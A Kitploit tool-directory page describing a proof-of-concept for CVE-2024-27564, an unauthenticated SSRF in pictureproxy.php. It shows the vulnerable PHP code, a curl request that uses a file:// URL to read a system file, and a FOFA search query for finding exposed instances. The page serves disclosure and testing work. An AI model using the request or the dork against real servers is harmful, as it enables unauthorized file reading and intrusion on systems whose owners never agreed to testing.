Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-27564 — Proof-of-concept exploit for CVE-2024-27564, a server-side request forgery (SSRF) vulnerability in pictureproxy.php allowing unauthenticated remote attackers to inject arbitrary URLs via the url parameter. | Kitploit
Tools/GitHubGitHub/chsxthwik/cve-2024-27564
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringWeb Security
GitHubchsxthwik/cve-2024-27564

CVE-2024-27564

Proof-of-concept exploit for CVE-2024-27564, a server-side request forgery (SSRF) vulnerability in pictureproxy.php allowing unauthenticated remote attackers to inject arbitrary URLs via the url parameter.

View Repository
12411 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-27564

Description:

A vulnerability in pictureproxy.php allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.

The vulnerable code is in the pictureproxy.php file. The issue occurs because the function does not properly validate the url parameter. The $_GET['url'] variable is passed to the file_get_contents() function, which fetches content from the specified URL. This can lead to SSRF.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl Request:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Mitigation:

Proper Management of Input validation is needed.

Download Tool